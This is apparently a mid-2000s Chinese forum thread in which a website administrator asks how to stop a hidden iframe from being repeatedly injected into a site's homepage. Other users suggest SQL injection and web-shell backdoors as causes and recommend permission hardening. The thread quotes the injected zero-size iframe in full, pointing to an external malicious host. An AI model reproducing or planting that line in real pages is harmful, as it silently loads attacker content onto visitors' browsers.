[求助] 网站页面被嵌入恶意代码，有谁知道应该怎么根治？

37554215

网站页面被嵌入恶意代码，有谁知道应该怎么根治？
服务器是2003，杀毒软件是卡吧服务器版，发现首页的index.htm经常在底部被嵌入一串恶意代码：

<iframe width="0" height="0" frameborder="0" scrolling="no" src="http://webshell.cardb.cn/hinet.htm" name="loginf"></iframe>

每次删了过几天又有了～全盘杀毒也没发现有什么病毒，请问大家遇到过吗？怎么处理的？

网页有漏洞  或是服务器有漏洞

刚才搜了一些这窜代码，发现网上中招的页面还挺多，应该是个比较典型的病毒或漏洞吧？

SQL注入

是烦  我也中过...

服务器里有后门 或者网页目录中有后门 服务器支持ASP或者PHP吧 请多多注意C/S型的后门 插入很简单 比较难找
你可以在设置服务器用户读写权限 然后在查找木马 修补服务器漏洞 和常见的SQL注射 并注意降低到DBOWENER权限 可以防止SA权限帐户直接造成服务器的破坏
比较常见的有海洋 老兵 浪子 还有Saiy写的一些网页木马 一般加密后就不杀了 楼主用工具在网页目录搜索下关键字吧

这个小工具可能会帮你点忙

原帖由 shzxxx 于 2006-6-8 17:46 发表
服务器里有后门 或者网页目录中有后门 服务器支持ASP或者PHP吧 请多多注意C/S型的后门 插入很简单 比较难找
你可以在设置服务器用户读写权限 然后在查找木马 修补服务器漏洞 和常见的SQL注射 并注意降低到DBOWEN ...

那些木马我研究过，能做的权限很大，运行cmd都可以，但那些ASP木马好像没有把服务器的htm文件都嵌入那串代码的功能，我怀疑是不是某种病毒自动搜索并攻击有漏洞的服务器，添加代码的

有知道真正问题的吗？现在不知道改怎么预防，服务器上asp的站点很多，不可能都去检查代码